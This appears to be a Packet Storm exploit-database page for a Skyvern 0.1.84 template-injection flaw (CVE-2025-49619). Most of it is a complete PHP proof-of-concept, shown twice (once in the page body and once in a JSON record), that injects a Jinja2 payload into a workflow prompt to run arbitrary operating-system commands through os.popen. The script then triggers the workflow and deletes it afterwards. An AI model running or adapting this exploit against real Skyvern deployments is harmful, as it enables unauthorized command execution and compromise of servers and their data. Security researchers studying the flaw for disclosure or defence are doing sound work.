📄 Skyvern 0.1.84 Template Injection / Code Execution_PACKETSTORM:215882

8.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Description

Skyvern version 0.1.84 remote code execution proof of concept exploit that leverages a vulnerability in workflow creation functionality where user-supplied input in the prompt field is processed through Jinja2 templating engine without proper...

Visit Original Source

Basic Information

ID PACKETSTORM:215882

Published Feb 19, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Skyvern 0.1.84 Code Execution Vulnerability Analysis |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.skyvern.com/ |
=============================================================================================================================================

[+] Summary :
The vulnerability exists in the workflow creation functionality where user-supplied input
in the prompt field is processed through Jinja2 templating engine without proper sanitization, allowing attackers to execute arbitrary Python code and ultimately system commands..

[+] POC :

php poc.php

<?php

class SkyvernSSTI_RCE {

private $target;
private $api_key;
private $workflow_id;

public function __construct($target, $api_key) {
$this->target = rtrim($target, '/');
$this->api_key = $api_key;
$this->workflow_id = null;
}

private function send_request($method, $endpoint, $data = null) {
$url = $this->target . $endpoint;

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 30,
CURLOPT_HTTPHEADER => [
'X-API-Key: ' . $this->api_key,
'Content-Type: application/json'
],
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);

if ($data !== null) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
}

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
throw new Exception("Request failed: " . $error);
}

return [
'code' => $http_code,
'body' => $response
];
}

private function create_workflow_json($payload) {
return [
'title' => $this->random_string(8),
'description' => '',
'proxy_location' => 'RESIDENTIAL',
'webhook_callback_url' => '',
'persist_browser_session' => false,
'model' => null,
'totp_verification_url' => null,
'workflow_definition' => [
'parameters' => [],
'blocks' => [
[
'label' => 'block_1',
'continue_on_failure' => false,
'block_type' => 'task_v2',
'prompt' => $this->generate_payload($payload),
'url' => '',
'max_steps' => 25,
'totp_identifier' => null,
'totp_verification_url' => null
]
]
],
'is_saved_task' => false
];
}

private function generate_payload($command) {
return
"{% for x in ().__class__.__base__.__subclasses__() %}\n" .
" {% if 'warning' in x.__name__ %}\n" .
" {{ x()._module.__builtins__['__import__']('os').popen(\"" .
addslashes($command) . "\").read() }}\n" .
" {% endif %}\n" .
"{% endfor %}";
}

private function random_string($length = 8) {
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$result = '';
for ($i = 0; $i < $length; $i++) {
$result .= $characters[rand(0, strlen($characters) - 1)];
}
return $result;
}

public function check() {
try {
$response = $this->send_request('GET', '/api/v1/workflows');

if ($response['code'] !== 200) {
return "Target is probably not Skyvern or API key is invalid";
}

$json_response = json_decode($response['body'], true);
if ($json_response === null) {
return "Failed to parse response - target may not be Skyvern";
}

return "Target appears to be Skyvern and is accessible";

} catch (Exception $e) {
return "Check failed: " . $e->getMessage();
}
}

public function create_workflow($payload) {
try {
$workflow_data = $this->create_workflow_json($payload);
$response = $this->send_request('POST', '/api/v1/workflows', $workflow_data);

if ($response['code'] !== 200) {
throw new Exception("Failed to create workflow. HTTP Code: " . $response['code']);
}

$json_response = json_decode($response['body'], true);
if (!isset($json_response['workflow_permanent_id'])) {
throw new Exception("Workflow ID not found in response");
}

$this->workflow_id = $json_response['workflow_permanent_id'];
echo "[+] Workflow created successfully. ID: " . $this->workflow_id . "\n";
return true;

} catch (Exception $e) {
echo "[-] Failed to create workflow: " . $e->getMessage() . "\n";
return false;
}
}

public function trigger_workflow() {
if (!$this->workflow_id) {
echo "[-] No workflow ID available\n";
return false;
}

try {
$data = ['workflow_id' => $this->workflow_id];
$response = $this->send_request('POST', "/api/v1/workflows/{$this->workflow_id}/run", $data);

if ($response['code'] !== 200) {
throw new Exception("Failed to trigger workflow. HTTP Code: " . $response['code']);
}

$json_response = json_decode($response['body'], true);
if (!isset($json_response['workflow_id']) && !isset($json_response['workflow_run_id'])) {
throw new Exception("Workflow execution response invalid");
}

echo "[+] Workflow triggered successfully\n";
return true;

} catch (Exception $e) {
echo "[-] Failed to trigger workflow: " . $e->getMessage() . "\n";
return false;
}
}

public function cleanup() {
if (!$this->workflow_id) {
return;
}

try {
$this->send_request('DELETE', "/api/v1/workflows/{$this->workflow_id}");
echo "[+] Workflow cleaned up\n";
} catch (Exception $e) {
echo "[-] Failed to cleanup workflow: " . $e->getMessage() . "\n";
}
}

public function exploit($command) {
echo "[*] Starting exploitation...\n";

echo "[*] Checking target...\n";
$check_result = $this->check();
echo "[*] Check result: " . $check_result . "\n";
echo "[*] Creating malicious workflow...\n";
if (!$this->create_workflow($command)) {
return false;
}

echo "[*] Triggering workflow execution...\n";
if (!$this->trigger_workflow()) {
return false;
}

echo "[+] Exploitation completed. Command should be executed.\n";
return true;
}
}

if (php_sapi_name() === 'cli') {

if ($argc < 4) {
echo "Usage: php " . $argv[0] . " <target_url> <api_key> <command>\n";
echo "Example: php " . $argv[0] . " http://localhost:8000 abc123 \"id\"\n";
exit(1);
}

$target = $argv[1];
$api_key = $argv[2];
$command = $argv[3];

$exploit = new SkyvernSSTI_RCE($target, $api_key);

try {
$exploit->exploit($command);
} catch (Exception $e) {
echo "[-] Exploitation failed: " . $e->getMessage() . "\n";
} finally {
$exploit->cleanup();
}
}

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-19T16:30:20",
    "description": "Skyvern version 0.1.84 remote code execution proof of concept exploit that leverages a vulnerability in workflow creation functionality where user-supplied input in the prompt field is processed through Jinja2 templating engine without proper...",
    "published": "2026-02-19T00:00:00",
    "modified": "2026-02-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Skyvern 0.1.84 Template Injection / Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215882",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-49619"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Skyvern 0.1.84 Code Execution Vulnerability Analysis                                                                        |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.skyvern.com/                                                                                                    |\n    =============================================================================================================================================\n    \n    [+] Summary : \n                 The vulnerability exists in the workflow creation functionality where user-supplied input \n    \t\t\t in the prompt field is processed through Jinja2 templating engine without proper sanitization, allowing attackers to execute arbitrary Python code and ultimately system commands..\n    \t\t\t \n    [+]  POC : \n    \n    php poc.php \n    \n    <?php\n    \n    class SkyvernSSTI_RCE {\n        \n        private $target;\n        private $api_key;\n        private $workflow_id;\n        \n        public function __construct($target, $api_key) {\n            $this->target = rtrim($target, '/');\n            $this->api_key = $api_key;\n            $this->workflow_id = null;\n        }\n        \n        private function send_request($method, $endpoint, $data = null) {\n            $url = $this->target . $endpoint;\n            \n            $ch = curl_init();\n            curl_setopt_array($ch, [\n                CURLOPT_URL => $url,\n                CURLOPT_RETURNTRANSFER => true,\n                CURLOPT_TIMEOUT => 30,\n                CURLOPT_HTTPHEADER => [\n                    'X-API-Key: ' . $this->api_key,\n                    'Content-Type: application/json'\n                ],\n                CURLOPT_CUSTOMREQUEST => $method,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_SSL_VERIFYHOST => false\n            ]);\n            \n            if ($data !== null) {\n                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));\n            }\n            \n            $response = curl_exec($ch);\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\n            $error = curl_error($ch);\n            curl_close($ch);\n            \n            if ($error) {\n                throw new Exception(\"Request failed: \" . $error);\n            }\n            \n            return [\n                'code' => $http_code,\n                'body' => $response\n            ];\n        }\n        \n        private function create_workflow_json($payload) {\n            return [\n                'title' => $this->random_string(8),\n                'description' => '',\n                'proxy_location' => 'RESIDENTIAL',\n                'webhook_callback_url' => '',\n                'persist_browser_session' => false,\n                'model' => null,\n                'totp_verification_url' => null,\n                'workflow_definition' => [\n                    'parameters' => [],\n                    'blocks' => [\n                        [\n                            'label' => 'block_1',\n                            'continue_on_failure' => false,\n                            'block_type' => 'task_v2',\n                            'prompt' => $this->generate_payload($payload),\n                            'url' => '',\n                            'max_steps' => 25,\n                            'totp_identifier' => null,\n                            'totp_verification_url' => null\n                        ]\n                    ]\n                ],\n                'is_saved_task' => false\n            ];\n        }\n        \n        private function generate_payload($command) {\n            return \n                \"{% for x in ().__class__.__base__.__subclasses__() %}\\n\" .\n                \"  {% if 'warning' in x.__name__ %}\\n\" .\n                \"    {{ x()._module.__builtins__['__import__']('os').popen(\\\"\" . \n                addslashes($command) . \"\\\").read() }}\\n\" .\n                \"  {% endif %}\\n\" .\n                \"{% endfor %}\";\n        }\n        \n        private function random_string($length = 8) {\n            $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';\n            $result = '';\n            for ($i = 0; $i < $length; $i++) {\n                $result .= $characters[rand(0, strlen($characters) - 1)];\n            }\n            return $result;\n        }\n        \n        public function check() {\n            try {\n                $response = $this->send_request('GET', '/api/v1/workflows');\n                \n                if ($response['code'] !== 200) {\n                    return \"Target is probably not Skyvern or API key is invalid\";\n                }\n                \n                $json_response = json_decode($response['body'], true);\n                if ($json_response === null) {\n                    return \"Failed to parse response - target may not be Skyvern\";\n                }\n                \n                return \"Target appears to be Skyvern and is accessible\";\n                \n            } catch (Exception $e) {\n                return \"Check failed: \" . $e->getMessage();\n            }\n        }\n        \n        public function create_workflow($payload) {\n            try {\n                $workflow_data = $this->create_workflow_json($payload);\n                $response = $this->send_request('POST', '/api/v1/workflows', $workflow_data);\n                \n                if ($response['code'] !== 200) {\n                    throw new Exception(\"Failed to create workflow. HTTP Code: \" . $response['code']);\n                }\n                \n                $json_response = json_decode($response['body'], true);\n                if (!isset($json_response['workflow_permanent_id'])) {\n                    throw new Exception(\"Workflow ID not found in response\");\n                }\n                \n                $this->workflow_id = $json_response['workflow_permanent_id'];\n                echo \"[+] Workflow created successfully. ID: \" . $this->workflow_id . \"\\n\";\n                return true;\n                \n            } catch (Exception $e) {\n                echo \"[-] Failed to create workflow: \" . $e->getMessage() . \"\\n\";\n                return false;\n            }\n        }\n        \n        public function trigger_workflow() {\n            if (!$this->workflow_id) {\n                echo \"[-] No workflow ID available\\n\";\n                return false;\n            }\n            \n            try {\n                $data = ['workflow_id' => $this->workflow_id];\n                $response = $this->send_request('POST', \"/api/v1/workflows/{$this->workflow_id}/run\", $data);\n                \n                if ($response['code'] !== 200) {\n                    throw new Exception(\"Failed to trigger workflow. HTTP Code: \" . $response['code']);\n                }\n                \n                $json_response = json_decode($response['body'], true);\n                if (!isset($json_response['workflow_id']) && !isset($json_response['workflow_run_id'])) {\n                    throw new Exception(\"Workflow execution response invalid\");\n                }\n                \n                echo \"[+] Workflow triggered successfully\\n\";\n                return true;\n                \n            } catch (Exception $e) {\n                echo \"[-] Failed to trigger workflow: \" . $e->getMessage() . \"\\n\";\n                return false;\n            }\n        }\n        \n        public function cleanup() {\n            if (!$this->workflow_id) {\n                return;\n            }\n            \n            try {\n                $this->send_request('DELETE', \"/api/v1/workflows/{$this->workflow_id}\");\n                echo \"[+] Workflow cleaned up\\n\";\n            } catch (Exception $e) {\n                echo \"[-] Failed to cleanup workflow: \" . $e->getMessage() . \"\\n\";\n            }\n        }\n        \n        public function exploit($command) {\n            echo \"[*] Starting exploitation...\\n\";\n    \n            echo \"[*] Checking target...\\n\";\n            $check_result = $this->check();\n            echo \"[*] Check result: \" . $check_result . \"\\n\";\n            echo \"[*] Creating malicious workflow...\\n\";\n            if (!$this->create_workflow($command)) {\n                return false;\n            }\n    \n            echo \"[*] Triggering workflow execution...\\n\";\n            if (!$this->trigger_workflow()) {\n                return false;\n            }\n            \n            echo \"[+] Exploitation completed. Command should be executed.\\n\";\n            return true;\n        }\n    }\n    \n    if (php_sapi_name() === 'cli') {\n        \n        if ($argc < 4) {\n            echo \"Usage: php \" . $argv[0] . \" <target_url> <api_key> <command>\\n\";\n            echo \"Example: php \" . $argv[0] . \" http://localhost:8000 abc123 \\\"id\\\"\\n\";\n            exit(1);\n        }\n        \n        $target = $argv[1];\n        $api_key = $argv[2];\n        $command = $argv[3];\n        \n        $exploit = new SkyvernSSTI_RCE($target, $api_key);\n        \n        try {\n            $exploit->exploit($command);\n        } catch (Exception $e) {\n            echo \"[-] Exploitation failed: \" . $e->getMessage() . \"\\n\";\n        } finally {\n            $exploit->cleanup();\n        }\n    }\n    \n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215882",
    "cvss": {
        "score": 8.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215882/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply